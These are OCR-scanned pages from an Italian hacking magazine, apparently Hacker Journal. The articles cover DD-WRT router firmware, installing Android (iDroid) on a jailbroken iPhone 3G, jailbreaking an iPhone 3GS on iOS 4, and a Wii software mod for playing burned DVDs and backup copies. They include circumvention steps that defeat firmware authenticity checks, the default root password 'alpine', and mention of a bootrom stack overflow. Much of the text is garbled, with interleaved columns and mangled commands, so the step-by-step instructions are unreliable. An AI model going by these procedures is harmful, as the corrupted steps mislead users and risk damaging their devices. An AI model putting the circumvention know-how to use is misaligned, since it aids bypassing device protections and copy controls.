mette a disposizione diverse funzionalità 
che vengono raccolte in un framework 
su cui è installata una distro di Linux 
creata per gestire ogni possibilità 
offerta da ogni router. In questo Modo, 
il framework rende uniforme l’ambiente 
in cui agisce Linux, mettendo a 
disposizione degli utenti una interfaccia 
‘comune per diversi dispositivi e un set 
completo di funzionalità che possono 
sfruttare totalmente l'hardware della 
appliance utilizzata. Pensiamo, per 
esempio, di avere due router: il primo 
che integra uno switch, un apparato 
WLAN e un firewall mentre il secondo 
è un semplice Access Point che 
dispone solo di una interfaccia di rete 

e un apparato WLAN. Installando DD- 
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WAT su entrambi i dispositivi, questo 
agirà sul primo permettendoci di 
configurare sia la parte WLAN che il 
firewall. e lo switch, mentre sul secondo 
agirà solo sulla WLAN. Il tutto con una 
interfaccia, però, identica. L'accesso 
alla configurazione avviene tramite un 
normale browser, non vengono richiesti 
driver (ovviamente) o programmi di 
configurazione aggiuntivi. Inoltre, 
essendo un firmware Open Source 
usato su tanti dispositivi differenti, la sua 
stabilità è ormai più che consolidata: 
attualmente ci sono professionisti che 
installano metodicamente DD-WRT 
perché dà ampie garanzie di buon It 


funzionamento, a fronte di firmware 
nativi sviluppati spesso in fretta e senza 
un'accurata fase di debug. 


UPGRADE 
SEMPLICE 


Per installare DD-WRT basta andare 
sul sito di riferimento del progetto 
(Www.dd-wrt.com) e cliccare sulla 
voce Download. Poi bisogna cercare la 
propria appliance tra quelle proposte 
e cliccare sul modello a cui vogliamo 
cambiare firmware. A questo punto ci 
verranno proposte diverse versioni di 
firmware da scaricare, adatte a varie 
esigenze di installazione. Quella più 
semplice da usare è la mini-build con 
installazione via Web ma, a seconda 
dell’appliance, potremmo dover 


installare una versione che fa l'upgrade 
via TFTP. Spesso, nell'elenco vengono 
incluse anche versioni pre configurate 
per applicazioni specifiche, come il 
supporto già attivo al VOIP oppure ai 
servizi della XBox. Una volta scaricato 
il firmware adatto occorre collegarsi 
all'interfaccia di aggiornamento della 
nostra appliance (le modalità variano da 
appliance ad appliance) ed applicare 
DD-WRT come se fosse un normale 
update. A questo punto, l’appliance si 
riavvierà e potremo controllarla tramite 

il nostro nuovo sistema. Prima di 
configuraria a dovere, magari aiutandoci 
con Il forum presente sul sito oppure 
con l'help integrato, spendiamo un 

po' di tempo a controllare le varie 
funzioni che DD-WRT ci mette a 
disposizione perché sono spesso 
nettamente diverse da quelle fornite 

dal firmware nativo. Per esempio non 

è raro trovare che gli Access Point 
LinkSys usano nativamente una 
potenza di trasmissione non superiore 
al 70%, mentre DD-WRT ci permette 

di portarla al 100%, ampliando il loro 
raggio d'azione. Allo stesso tempo è 
‘abbastanza comune che un Access 
Point possa funzionare come Repeater 
ma anche che un Repeater possa 
trasformarsi in un Access Point! 

Tra le varie opzioni, inoltre, avremo 

a disposizione dei collegamenti con 
servizi esterni che ci permetteranno di 
semplificarci notevolmente la gestione 
della nostra rete anche i remoto, come il 


MODALITA DI FUNZIONAMENTO 


servizio No-IP (www.no-ip.com), oppure 
che ci consentiranno di dedicare in 

parte o totalmente la nostra banda 

WLAN a sistemi di Hotspot già esistenti 
come il noto Sputnik (www.sputnik. 

com) oppure a sistemi di protezione 

della privacy come AnchorFree (www. 
anchorfree.com). Su molte appliance, 
inoltre, potremo assegnare interfacce 

di rete della parte switch a una DMZ, 
‘anche se non disponiamo di una porta pet 
WAN. Viceversa, la porta WAN potrà 
essere usata, in funzione delle capacità 
hardware, come una normale porta 
dello switch. Insomma: DD-WRT è un 
finmware che ci permette di prendere 
il pieno controllo del nostro hardware 
al di là delle limitazioni imposte dai 
produttori e, viste le sue capacità, c'è 
da sperare che un domani ci saranno 
dei firmware simili per qualsiasi 
dispositivo. Think open! 


|llrduter don DD-WRT possono funzionare in diverse modalità. in funzione dell'hardWare disponibile su ogni. applanea, 
Questo picocio elenco aiuta nello: scegliere là modalità Corretta per le nostre esigenze. 
Access Point - Il metodo classico di funzionamento: una LAN collegata all'appliance, una rete WAN con dei client gestiti. 
Glient - Serve per trasformare l’appliance:in una specie di scheda wireless. che mette in comunicazione un computer 
‘Hollegato via LAN a un Access: Paint! Il caso tipico di utilizzo è quando il segnale delle normali schede di lil 
‘ttoppo deboli per essere utilizzate per collegare un computer «dè preferibile usare un'apparecchiatura più 
Client Bridge - Simile al Client, viene usato quando non si collega un computer ma una rete cablata formata da dia 
dispositivi, Il caso più frequente di utilizzo è quando da un Access Point distribuiamo la nostra:connessione a Internet a 
[rata LAN] autonomie (Le.: il vicino: di casa); Nol avremo. un: Access: Point è lui un!Glient Hhidge, Se lui vorra! avere accesso RITI 
Wireless, però, dovra avere un suo Access: Point perché il bridge:non gli permetterà la connessione dell client. Ù 
AdHoc - Un tipo di collegamento che avviene tra due dispositivi che sono collegati esclusivamente in modalità 1:1 


(entrambi.“AdHoc"). Poco usato se non per connettere segmenti di rete cablata attraverso 


ponti radio, 


||Repeater:-|Permettedi ricevereil segnale Wirelessidi un AccessiPGiht s di tjpeterlo nell'area. atomo! all'appliance: 
Ideale per estendere il'raggio d'azione di un Access Point ma comporta il dimezzariento della banda! disponibile dopo.la 
ripetizione. Viene, comunque, usato quando si condividono connessioni a Internet perché la appliance interessata non 
necessita di alcun collegamento:di rete cablata, basta una presa di corrente: 
'repeater Bridge : Funziona come il repeater ma Viene Usato per mettere in comunicazione due segmenti di rete. Viene: 
sato per prolungare il raggio d'azione di Una rete Wireless in modo da arrivare al Segmento successivo. 
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di 
‘castellano.vito@gmail.com 


cAN22019 


RO LA GUIDA,PRATICA 
PERS TALLARE ID_SU 
UN IPHON NATURALMENTE 


JAILBREAKKATO. 


un vero e proprio DualBoot. 
Attenzione per far sì che il 
procedimento funzioni bisogna 
‘avere un iPhone jailbrekkato 
con firmware non superiore a 
4.0° Se avete già eseguito degli 
aggiornamenti, ad esempio 4,0.1 


non va come previsto, quindi 
occorre non perdersi d’animo e 
avere una certa determinazione 
per il conseguimento del risultato 


n questa guida verrà 
‘spiegato come poter portare 
“Android Froyo 2.2 su iPhone 
.3G jailbrekkato. 

Su tratta di una guida 
facilmente accessibile a tutti, ma, 
sicuramente, chi conosce e ha 
fatto già pratica con Linux è un 
passo avanti. 


Se proprio lo dovete fare è 
consigliabile tornare a 3.1.313 


Come tutte le procedure non 
autorizzate dalla casa madre, 
‘anche questa determina un 
decadimento della garanzia 
dell’ iPhone nonché una piccole] 
dose di rischi correlati, anchei 
se si tratta di un procedimento 
piuttosto diffuso e sperimentato. 
Comunque è sempre bene essere? 
consapevoli dei rischi intrinseci. 
Come si dice: uomo avvisato.? 


* iRecovery ( Per Windows ) 


‘Adesso è possibile collegare 
l’iPhone al computer e metterlo in 
modalità Recovery. Per mettere 
l'iPhone in modalità Recovery. 
basta semplicemente collegarlo 
‘al proprio computer e quindi 
schiacciare contemporaneamente 
il tasto “Home” ovvero il tasto. 
centrale dell'iPhone e il tasto 
“Spegni/Accendi” ovvero il tasto 


Unico problema da segnalare 
prima di iniziare il nostro tutorial 
è che la procedura in questione. 
‘potrà richiedere, in alcuni casi, 
.che alcuni passaggi vengano 
ripetuti anche più volte se tutto 


Certo grazie ad 
avremo la pos: 
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che normalmente : si sta per 
accendere il telefono. Dopo circa 
"3-4 secondi dovrebbe spegnersi Ù 


Tenete ancora premuti i due tasti 
finché non visualizzate il logo della 
mela, a quel punto non dovrete 
più schiacciare il tasto “Power”. 
ma tenete ancora premuto il tasto 
“Home” finché non visualizzerete 
il logo di iTunes che vi indica di 

‘ attaccare il telefono al computei 

f Alla fine dovreste trovarvi nella 
situazione come riportato nella 
figura 


Adesso il vostro iPhone si trova 
in modalità £ Recovery. quindi 
‘apriamo iTunes. 
Esso vi avvertirà che ha rilevato 
il telefono in modalità ripristino, 
e ovviamente vi chiederà di 
(ripristinarlo.Tenendo premuto 
[il tasto & Shift £ della tastiera e 
facendo click con il mouse sul 
bottone “Ripristina £ avrete la 
possibilità di selezionare il vostro 


Nel nostro esempio 
‘andremo a selezionare 
.iPhone1,2_3.1.3 7D11 Restore. 


Inizierà così il ripristino, ad un 
‘certo punto iTunes riscontrerà uno 
;dei seguenti errori (1011, 1013, 
1015) occorrerà quindi eseguire 
queste semplici operazioni: 
Prima di tutto installiamo la libreria 
libusb (libusb-win32-filter-bin- 
:0.1.12.2.exe), la troverete nella 
cartella di Recovery. 
Attenzione per gli utenti di 
{Windows Vista/7: Prima di 
installare la libreria USB, tasto 
destro sul file libusb-win32-filter- 


compatibilità con Windows XP SP2 

e spuntiamo la voce “esegui come 

‘amministratore”, poi diamo ok. 

Adesso andremo ad avviare il 

Prompt dei comandi. y 

| Per avviare il prompt dei comandi 
sli 


s Start>esegui >digitare “cmd 


‘ovviamente senza virgolette 
{Windows XP ). ti 
Start >cercare esegui>una | 
volta trovato >digitare “cmd“ 
ovviamente senza virgolette 
( Windows Vista/7 ). î 


-Adesso bisognerà posizionarsi 
nella cartella che contiene 
iRecovery questo dipenderà da 
il consiglio è di tenerla a portata 


di mano sul Desktop e digitare nel 
Prompt dei comandi 


‘cd Desktop\"nome cartella che 
contiene il programma iRecovery £ 
‘cd Desktop\iRecoveryL{< 
premere “invio >Î 


‘adesso che ci siamo posizionati 
nella cartella è arrivata l’ora di 
eseguire iRecovery dando questo 


iRecovery.exe-s< premere 
invio > 

‘e di conseguenza diamo questi 
‘comandi 


In questo modo l'iPhone uscirà 
dalla modalità “Recovery e lo 
vedrete riavviarsi. Adesso avete. 
in mano il vostro iPhone con 
Firmware 3.1.3 
E' arrivato il momento di effettuare 
il JailBrekkare del “melafonino”; 
si consiglia di utilizzare RedSnow. 


dove avrete posizionata la cartella, 


Ora abbiamo tutto il necessario, 
(checi serve per poter installare 
‘Android su iPhone. 


procuriamoci i seguenti file: 


anche perché se volete mettere È 
Android, effettuando il jailbreak 


#. con altri programmi ( Spirt, 


BlackRa1n ecc. ) ‘andrà in conflitto5 
e non riuscirete ad installarlo. 
Non staremo qui a spiegarvii 


f come effettuare il Jailbreak con 


RedSnow esistono numerose guide 
in rete comunque se proprio non 
dovreste riuscirci potete contattare 


ff la redazione. d ì 


Bene adesso abbiamo il nostro 
iPhone 3G OS 3.1.3 Jailbrekkato, 
con Cydia installato ; apriamo 


Cydia e andiamo a ricercare prima, 


di tutto OpenSSH e installiamolo 
questo programma ci permetterà di 
aprire una sorta di comunicazione 
che ci consentirà di trasferire i 


i nostri file dal computer all'iPhone” 


Andremo ad installare anche i 
“Sbsetting“ questo programma 

ci aiuterà a mantenere sotto. 
controllo lo stato attivo dii 
OpenSSH, per utilizzare questo 
programma basterà semplicemente { 
far scivolare il dito in senso 
orizzontale sulla barra di stato. 
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chiamato “ninn’s extraction.\ 
technique” questo “programma”. 
lo troveremo nella cartella 
Had estrazione con il nome di i ! ( 
Tutti Muesii file li troverete 2g extractiontechnique0.2.sh * qui creeremo una nuova cartella 
nel blog all’indirizzo http:// oa = è chiamandola “firmware” in modo 
| idroidshare.blogspot.com/. 4 I 
ll'Adesso per prima cosa É ICOME“AVVIAREU!L 
| scompattiamo tutti gli archivi PROGRAMMA? 
pi idroldi .0.2.tar.gz , openiboot.tar. 
Î gz } estrazione.tar.gz) e portiamo {È ETA sil Che copieremo anche dentro 
le cartelle sulla Scrivania .“({{}{MMi Innanzi tutto avviamo il terminale la cartella “idroid”. Alla fine il 
Ricordatevi bene che su Ubuntu il 2 lo troveremo in 1 i risultato deve essere questo 
desktop si chiama Scrivania f SE ER 
fi Adesso accendete il Wi-fi su icazioni (i tar Private>,Var >firmware i 
iPhone e anche il servizio SSH HUINTIIE Private>Var>idroid>firmwar 
potrete attivare questi servizi È È 
tramite “Sbsetting" e annotatevi il @ aperto il terminale daremo questi dove in questa cartella firmware 
| vostro indirizzo IP. Ora su Ubun comandi HE { inseriremo i nostri 3 driver che 
andremo i in 888 î abbiamo estratto poco fa (sd8686.'8 
cd Scrivania (ci spostiamo sul bin % sd8686_helper.bin $ zephyr2.i 
Desktop) 
cd estrazione ( ci spostiamo nella 
cartella estrazione ) ; Bene siamo giunti agli ultimi 
passaggi adesso ricordate 
all’inizio della guida quando vi 
avevamo fatto mettere in modalità 
Recovery l'iPhone? Ecco, ora 
dovrete di nuovo eseguire quella 
procedura. 
Una volta messo in modalità 
Recovery. apriamo il terminale di 
Ubuntu e digitiamo 
cd Scrivania ( con questo @ 
‘comando ci sposteremo sul 


Qui troverete il vostro iPhone, 
facendo click su di esso apparirà 
una finestra dove inseriremo 


extractiontechnique0.2.sh 


Nome utente : root 
Password : alpine ( è la password 
di default di OpenSSH ) 


extractiontechnique0.2.sh 


e ci ritroveremo in una condizione 
come nell'immagine in figura. 


i Bene adesso siamo dentro 
seguiamo questo percorso 
spostandoci tra le cartelle 


> 


sudo apt-getfinstall 
libusb-0%1. sf(cifchiederà 


Prima di tutto creiamo una 
cartella e la rinomineremoÎ 
“sdcard" questa cartella andrà 
‘ad emulare appunto la sd card, lo. 
spazio dove potremmo inserire i 
nostri file! ù 
Sempre in “Private ? Var“ 
sposteremo tutta la cartella 
j'idroid* ovvero la cartella che 
contiene : android.img.gz ; 7 cache. 
img * system. .img , userdata.img 5 


openiboot'contenete"3 
AtafR ossi sec fici 


ovviamente basta inserire su 
terminale prima 4.12 e dopo 
che avrà estratto. il Primo driver, 
‘andremo ad inserire 83” 
Adesso nella cartella estrazione ci 
troveremo 3 nuovi file ovvero : 


Dando questo comando #6 
troveremo evidenziata sullo1 
schermo del nostro iPhone una 
schermata come quella proposta 
in figura, che ci mostrerà tre 
possibili selezioni: iPhone OS 
Console e iDroid. 


‘a caricare i driver necessari per, 
il funzionamento del Wi-Fi e del 


'5d8686.bin,#sd8686 helper- 
bin%Ézephyr2.bin" 


Fatto questo ritorniamo sulla 


Per ricavare i driver useremo 
un metodo di estrazione 
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‘Adesso andremo a spostarci 

su console attraverso i tasti 
dell’iPhone per regolare il volume, 
quindi spostiamoci su console 

e schiacciamo una sola volta il 
tasto “ Home “ del nostro iPhone. 
Inizieranno ad apparire sullo 
schermo del nostro iPhone tante 
‘stringhe di codice, 

non stiamo qui a spiegarvi cosa 
rappresentano, a voi interessa solo 
che l’ultima stringa stampi 


‘a WELCOME _ TO. OPENIBOOT 2° 


‘adesso sempre da terminale 
fandremo a digitare 
[5 Wi sudof:/oibc 


ici ritroveremo in una situazione 
dove le stesse stringhe stampate 
nel terminale appariranno 
‘contemporanemante. sull'iPhone 
come in figura 


I tin att “Snai 
gu ri 


logo (10624 


puocmi (48896 
Reading:/nsrvf T(21504 
Reading:} patof(51792 
Reading:fbatl p(05368 
Reading:fglyC. T(21376 
Reading: glyPÎ (20352 
Reading:fchg0f(20736 
Reading:fcha1f(25920 
Reading:%batF£(77120 


Performing upgrade... 


Flashing 
171328 bytes) 


(alaa218, 
(ala£620, 
‘(albd7e87 


{aldc£48, 


prati e ogg» Ab 


ci stamperà una serie di stringhe 
come questa i 


Home £ una sola volta, vedremo 
caricarsi tutto il £ Kernel “ e 
successivamente “ Android “ fino 
ad arrivare a questo risultato. 


Qui finisce la mia guida per 
qualsiasi problema o informazione 
scrivete alla redazione o passate 
direttamente al blog dell’autore 


blogg:jhttp: //iaroidshare. 
biogspot® *com/. 

Se lascerete qualche commento vi 
verrà risposto in tempi brevi. 
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MOBILE/FACILE 


ualcuno già li cono- 

scerà, per gli altri 

diventeranno presto 

familiari, dato che 

i ragazzi del Dev 
Team dopo aver sbloccato in 
passato gli iPhone dalla prima 
alla terza generazione, si sono 
occupati rapidamente di rimuo- 
vere il blocco anche da iOS 4, il 
sistema operativo dell’iPhone 4. 
Pochissimo tempo dopo il 
rilascio del sistema operativo, 
hanno infatti reso disponibile nel 
loro blog (http://blog.iphone-dev. 
org) l'aggiornamento di Pwna- 
geTool, uno strumento in grado 
di modificare il firmware originale 
per permettere di aggiornare 
iPhone 3G e 3GS già sbloccati 
alla nuova versione di i0S 4 sen- 
za perdere precedenti sblocchi. 
Lo sblocco in questione riguarda 
la possibilità di installare ap- 
plicazioni liberamente e viene 


chiamato candidamente “Jailbro- { 


ken”, ossia “gabbia rotta”. 
Vediamo cosa si deve fare! 
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ff 


CRACKING 
COME AVERE 
105 4 SU 
IPHONE 
3GS SENZA. 
1 BLOCCHI DI 
APPLE. 


REQUISITI 


Come premessa dovuta, ricordia- 
moci che modificare il firmware del 
telefonino in modo non ufficiale può 
invalidare la garanzia ed è bene che 
tale operazione venga comunque 
fatta solo se ci si rende bene conto 
di cosa stiamo facendo. 

Detto ciò, al momento Pwnage- 
Tool 4.01 è disponibile solo per 
Mac (con OS X 10.4 +), mentre per 
Windows (XP/Vista/Seven) dovre- 
mo aspettare l'ulteriore sviluppo di 
snOwbreeze (http://ih8sn0w.com) 
che permette di avere il firmware 
Jailbroken, ma non supporta anco- 
raios 4. 

Va detto subito che iPhone 2G e gli 
iPod Touch di prima generazione 
non sono al momento supportati 
dai tool. Sono invece supportati: 
gli iPhone 3GS che abbiano già a 
bordo un firmware “Jailbroken” e 
con bootrom più vecchio (per ca- 
pirci, se avete iBoot-359.3.2 o suc- 
cessivi non avete per ora alcuna 
possibilità perché con quell’aggior- 
namento Apple ha chiuso la falla 
che permetteva di generare uno 
stack overflow al boot del termina- 
le; stessa storia se avete un iPod 
Touch di seconda generazione con 
numero di serie che comincia con 
“MC" o un iPod Touch 3G; 

gli iPhone 3G e iPod Touch con 
firmware 3.0 e 3.1.2 sui quali si 

può agire tramite un altro tool del 
Dev Team chiamato redsnOw 0.9.5 
BETA (http://wikee.iphwn.org/ 
howto:rs9) che gira sia su Windows 
che Mac. 

Per sapere che versione di iBoot 
abbiamo possiamo usare l'utile 
tool iDetector (http://ih8sn0w.com/ 
index.php/products/view/idetector. | 
SNOW). 

Ovviamente poi il tool non può 


funzionare se il terminale è stato 
già aggiornato in modo standard a 
iOS 4l 


ROMPIAMO LA 
GABBIA 
nei 
Supponendo di avere un iPhone 


Scarichiamo dal sito del Per ora il software 
supporta solamente 


e = Dev Team PwnageTool pi "E 
prrieaiun pi “a direttamente in una cartella iPhone 3gS e iPad 
lel Dev Team, scarichiamo l’ultima “Pwnage” sul desktop. Touch 2G. 


release di i0S4 adatta al nostro te- 
lefonino. Abbiamo due possibilità: 
googliamo “i0S 4 download links” 
e scegliamo tra i numerosi risultati 
oppure colleghiamo il 3GS al Mac 
con il cavo usb e richiediamo il 
download via iTunes, senza instal- 
lare o aggiornare nulla (fondamen- 
tale!) 

Poi prima di proseguire facciamo 
un bel backup con iTunes seguen- 
do le indicazioni di Apple (http:// 
support.apple.com/kb/HT1766). 
PwnageTool è stato creato per 
modificare il firmware ufficiale 
(iPhone2,1_4.0_ 8A293_ Restore. 
ipsw) creandone uno modificato 
(patchato) proprio nella parte di 
boot: questa modifica permette 

di evitare che il terminale compia 
dei controlli sull’autenticità del 
firmware e possa essere possibile 
così evitare i blocchi presenti nel 
codice dato che aggiungeremo altri 
pacchetti software, non autorizzati 
(chissà perché!) da Apple. 
Installiamo PwnageTool e verrà 
creata un'icona che serve per lan- 
ciare il programma. Clicchiamoci 
sopra e aspettiamo che il program- 
ma si carichi e visualizzi il menu 
con 4 icone: selezioniamo l'icona di 
Einstein per impostare la modalità 
avanzata. Ci verrà quindi richiesto 
di indicare quale terminale voglia- 
mo connettere tra iPhone 3GS e 
iPad Touch 2G. Selezioniamo 3GS 
e ci verrà chiesto ora di selezionare 
il fimmware: indichiamo il path del 
file ipsw. 

Siamo pronti ora per “personaliz- 
zare” il nostro firmware: clicchiamo 
su “General” e possiamo scegliere 
di impostare “Activate the phone” 
se utilizziamo un gestore telefonico 
diverso da quello che ci ha venduto 
l'iPhone (altrimenti lasciamo l'icona 
de-selezionata). 

In “Cydia Settings”clicchiamo su 
“Download packages” e premiamo 


Dopo aver selezionato 
tutti I pacchetti che ci 
interessano possiamo 
procedere con la 
creazione del firmware 
modificato 


il pulsante Refresh. Selezioniamo 
poi | pacchetti che ci interessano 
(es. OpenSSH e OpenSSL) e accet- 
tiamo cliccando sulla freccia blu. 
Clicchiamo ora su “Select Packa- 
ges” poi “Select All” e di nuovo 
sulla freccia blu. 

In “Custom Packages Settings" 
clicchiamo direttamente sulla 
freccia blu. In “Custom logos 
settings” abbiamo la possibilità, se 
ci interessa, di cambiare | loghi vi- 
sualizzati durante il boot e durante 
il ripristino del terminale. Per chi 
vuole disegnarsele, le dimensioni 
sono 320x480 e va impostata la 
scala di grigi in RGB. 

Ora possiamo cliccare su “Build” e 
attendere la creazione del firmware 
modificato. Ci verrà chiesto il nome 
da dare al file e ci vorranno poi 
circa 10-30 minuti perché si com- 
pleti il processo a seconda della 
configurazione scelta. 

Quando il firmware patchato è 
stato creato, il software ci chiede 
l’autorizzazione per mettere l'iPho- 
ne in modalità ripristino (Recovery 
mode): diamo ok e connettiamo 
l'iPhone da spento. A questo punto 
premiamo e teniamo premuti il 
tasto Home e quello di Sleep/ 
Wake finché lo schermo diventerà 


Il processo di 
creazione del nuovo 
firmware può essere 
lungo, arrivando 
anche a 45 minuti. 


tutto bianco (dopo circa 5 secondi). 
Lasciamo quindi solo il pulsante di 
Sleep/Wake, mantenendo premuto 
il tasto Home finché lo schermo 
diventerà tutto nero. 

A questo punto iTunes ci avviserà 
con un messaggio che ha rilevato 
un iPhone in modalità di ripristino. 
Diamo ok e il nostro iPhone è pron- 
to per l'aggiornamento. 

A questo punto dobbiamo proce- 
dere con molta attenzione: tenen- 
do premuto il tasto Alt/Options 
premiamo sul pulsante “Restore”. 
Questo è il punto più delicato di 
tutto il processo: se non teniamo 
premuto Alt/Options ci ritroveremo 
l'iPhone aggiornato a i0S 4, ma 
completamente bloccato e sen- 
za possibilità di tornare indietro. 
Invece tenendolo premuto ci verrà 
chiesto il percorso del firmware 
che vogliamo flashare. Selezio- 
niamo il nostro firmware persona- 
lizzato e attendiamo che iPhone 

si occupi del trasferimento che 
durerà altri 10 minuti. 

Una volta flashato, avremo un 3GS 
con i0S4 Jailbroken, pronto per 
tutte le nostre sperimentazioni! E 
non dimentichiamo di ripristinare il 
backup fatto prima, così da tornare 
immediatamente operativi. 


Mr» Ta 
GAMES/MEDIO 


Imiliano Rinaldi 


‘e modifici HardWare “sono 
da “sempre un elemento che 
viaggia di pari passo con le 
‘COI nsole, grazie all'aggiunta 
È i chip particolari è, infatti, 
- possibile consentire alle console di 
— fiprodurre DVD masterizzati cosa 


di 
hardware è un po”fastidiosa, 
bisogna separarsi dall'amata console 
‘\per qualche tempo, non è facile. 
trovare operatori che la effettuino e CA 


Llmia 


ass bootelt database e 


Mac 05 esteso fournaled) 
Mac OS esteso 
Mac 05 esteso (Case-sensitive, Journaled) 
Mac 05 esteso (Case-sensitive) 

È Mac OS standard 

Flie System MS-005 

mi v File System MS-DOS (FAT16) 
imi__Flle System UNIX 


TESTE 
Ecco il contenuto della cartella 


“Zippata” che potete scaricare 
dalla sezione download del sito 
www.hackerjournal.it. 
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NTENDO DI RIPROD 


DVD MASTE 


IZZATI: il 


SOEIWARE 


E ZI IE 
soprattutto, decade irrimediabilmente 3 
— la garanzia. 


Proprio per questo risulta piuttosto. 
interessante la modifica ‘solo software" 
che è applicabile alla console Wii e che 
consente, al termine della stessa, di 
riprodurre DVD masterizzati. 


| La procedura è stata testata sulla mia 


Wii personale e funziona. Tuttavia, in 
caso di necessità, in rete è presente 
numerosa documentazione. 
Vediamo dunque quali sono tutti i 
passaggi da eseguire: 


«VERIFICA FIRMWARE 


Nulla di complesso basta accendere la 
console, spostarsi nella parte inferiore 
sinistra e cliccare sul pulsante Opzioni 
Wii, quindi su Impostazioni console 
Wii e leggere, nella parte superiore 
dello schermo, a'destra, il firmware in 
uso. Nel mio caso (vedi foto) la ver. è 
già la 4.2E perché la foto è stata fatta 
successivamente ad una (delle tante) 
modifiche; questo tutorial funziona per 
le versioni precedenti: 3.0 3.1.3:2.3.3 3.4 
4,0416422. 


GLI STRUMENTI 
Lariana em ri 


‘Sul sito www.hackerjournal.it, nella 
sezione download è disponibile il 


‘pacchetto, peraltro Scaricabile anche 


7 procedere alla modifica. Il pacchetto 
© contrassegnato con il nome Wii4-2 


da diversi indirizzi in rete, contentente 
tutti gli strumenti necessari per 


è riservato solo a coloro che hanno 
installato un firmware 4.2, l’altro, 


‘denominato WiiAll, è:per tutti coloro | Ù 


che hanno invece un firmware 8.0 3.1 
3.2 3.3 3,44.0 oppure 4.1. 


‘All'interno del pacchetto sono visibili 
i seguenti strumenti (all'intero della 
cartella apps) 


BannerBomb 
HackMii: installer 
NeoGamma 
clOS, Dop-l0S 


‘Tucha Bug Restorer MOD) ||: UNITA 


AnyTitle Deleter DB MOD 


LATO HARDWARE 
TTI ET I ETIIA 


Per installare i software dobbiamo 
munirci di una scheda SD da 16B 
(reperibile a buon mercato). Quindi 
‘serve uno slot in cui inserire la 
scheda in modo che venga letta dal 
‘computer e vi si possano caricare i 
file precedentemente scompattati. 
Personalmente ho acquistato per circa 
9 euro un adattatore usb in un grande 
magazzino che va benissimo per 
questo genere di operazione. 


nello slot della Wii, fa 
formattata nel formato FAT 

132. Se avi 
Utility Disco, c 
hittp://\www.sdcard.org/consumers/ 
formatter. Dopo che la scheda è stata 
‘formatta occorre copiarvi il contenuto 

|\del ‘pacchetto. precedentemente 

scaricato. 
All’interno del pacchetto noterete un 
file boot.elf che è quello che serve per 
fare il boot di avvio dalla scheda SD 
e caricare il software, questa parte, 
tuttavia, ve la potete anche EMERGE 
perl triomento, 


DA PCAWII 

NGI RZ 
{FATA I US 
A questo punto bisogna togliere 
la scheda SD dallo slot del PC ed 
inserirla nello slot della Wii. = 
Per accedere al suo'coritenuto ci 
sono due modi diversi a seconda 
del firmaware installato. 
Con una 
Wii 3.0/3.1:3.23.33.44.04.1 
bisogna accedere al menu della 
Wii -> Opzioni Wii -> Gestione dati 
-> Canali -> Wii -> Scheda SD. 
Con una Wiilcon firmware 
4.2 il percorso è molto: 
semplificato, basta accedere 
‘al pulsante con l’icona della 
Scheda SD che si trova in 
basso a sinistra accanto al 
pulsante Ppzioni Wii. 
A questo punto dovrebbe 
‘comparire in automatico 
una scritta Load boot. 
dol/elf ? che vi chiede 
‘se volete eseguire il 
programma. 
Premete su YES e aspettate il 
caricamento. 


HACKER JOURNAL 11 


= La) 
GAMES/MEDIO 


LI 


La procedura descritta prevede un collegamento ad internet della 
console. La mia, nello specifico, è collegata via Wi-Fi ad una rete 
Airport. Se la console è “offline” seguire questa procedura: 
Scaricare il pacchetto http://rapidshare.com/files/339836961 /offline!! 
all_version-23012010.rar (pesa parecchio, circa100 MB pet questo 
abbiamo deciso di non postarlo su HJ) 
Copiare il contenuto dentro la scheda SD. Seguire i passaggi della 
guida sopra esposti fino al puntoin cui parla di network installation. Qui 
bisogna scegliere di installare da scheda SD. 
= Aprire WAD Manager 1.5 e selezionare 10836. 
<[Premere A e lasciare NAND emulator disabled. 
+ Premere A per SD slot. 
Verrà presentata una lista di tutti gli gli IOS. Scotrere la lista e installare 
prima di tutto I0S70-64-v6687.wad e System Menu-NUS-v482.wad, Se 


HOMEBREW CHANNEL 


Comparirà una schermata nera con una 
‘serie di nomi dî software sulla sinistra, 
‘accompagnati dala scritta, dopo i due 
punti, Cari be installed. Niente panico, 
è tutto normale, utilizzando il Wiimote 
possiamo spostarci tra lè varie voci, 
selezionare HomeBrew Channel e 
confermare l'installazione con il pulsante 
A (del Wiimote). HomeBrew Channel è 

il programma che serve per eseguire 
i:software HomeBrew (tipicamente 


‘attraverso di esso possiamo installare i 
file wad che sono le applicazioni/giochi 
scaricabili anche da Wii Shop) fra cui il 
Loader: per caricare le copie di backup. 
Un volta che l'installazione è completata 
si ritorna in automatico al menu 
precedente (la schermata nera con le 
Opzioni di installazione da scheda SD). 
A questo punto spostatevi usando 
‘sempre il WiiMote fino ad evidenziare 
BootMii, entrate nel metiù con il pulsante 
A. Selezionate Install BootMii as boot2 
(se possibile; altrimenti Install BootMii 
as OS) e confermate l'installazione 
sempre con il pulsante A. Questo: 
passaggio è indispensabile se si vuole 
effettuare il backup della Wii prima di 
procedere all'installazione del software 
supplementare come leggeremo più 
avanti, 


BACKUP'DA BOOTMII 
(nel E ETTI LADRI ima ia DIRSI I cn 


Se avete installato BootMii, potete 
aa questo punto fare un bel backup 
della console per mettervi al riparo da 
‘eventuali malfunzionamenti successivi e 
ricaricare tutto il software originale pre- 
modifica. 

Per fare questa operazione occorre avere 
una scheda SD con uno spazio libero 

di 600 MB. La nostra scheda SD da un 
GB.che abbiamo consigliato all’inizio 
dovrebbe essere più che sufficiente. 
Se avete instllato BootMii nel Boot2, 
si può riavviare la Wii con la scheda 
SD inserita (fa il boot da qui). Se avete 
installato BootMii come I0S, 
dovete avviare il canale HomeBrew 
Channel che avete installato al 
passo precedente sempre con 

la scheda SD inserita. Una volta 
dentro HomeBrew Channel, 
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fallisce l'installazione dell'10$70 non proseguire per nessun motivo. 
Installare gli altri 25 IOS e poi Shopping Channel-NUS-v18.wad. 


premete sul tasto Home del WiiMote, 
scegliendo di avviare BootMii. 

Dopo il boot di avvio comparirà un 
menuicon 4 pulsanti (come nella foto 
sotto) per evitare di impazzire, come 
è successo a Me, vi svelo subito che 
“questi menu non sono navigabili:con 
i Wilmote ma solo premendo i bottoni 
Power e Reset (della:console). Con 
Power si navigano i menu e sotto 
menu, con il pulsante Reset si 

effettua la selezione: 

Selezionate il menu coi due ingranaggi. 
Quindi selezionate l'immagine che ha 
una freccia che va dal Chip verso la 
scheda SD. 

Confermate di voler effettuare il backup 
sulla scheda SD e attendete la fine 
della procedura. Questo passo richiede 
più di 15 minuti e, in generale, dipende 
dalla velocità della scheda SD che 
‘avete inserito. Non preoccupatevi di 
eventuali bad blocks segnalati durante 
il procedimento di backup, che si 
‘evolve scrivendo un quadratino verde 
dopo l'altro su una griglia grigia, perché 
è perfettamente normale. 

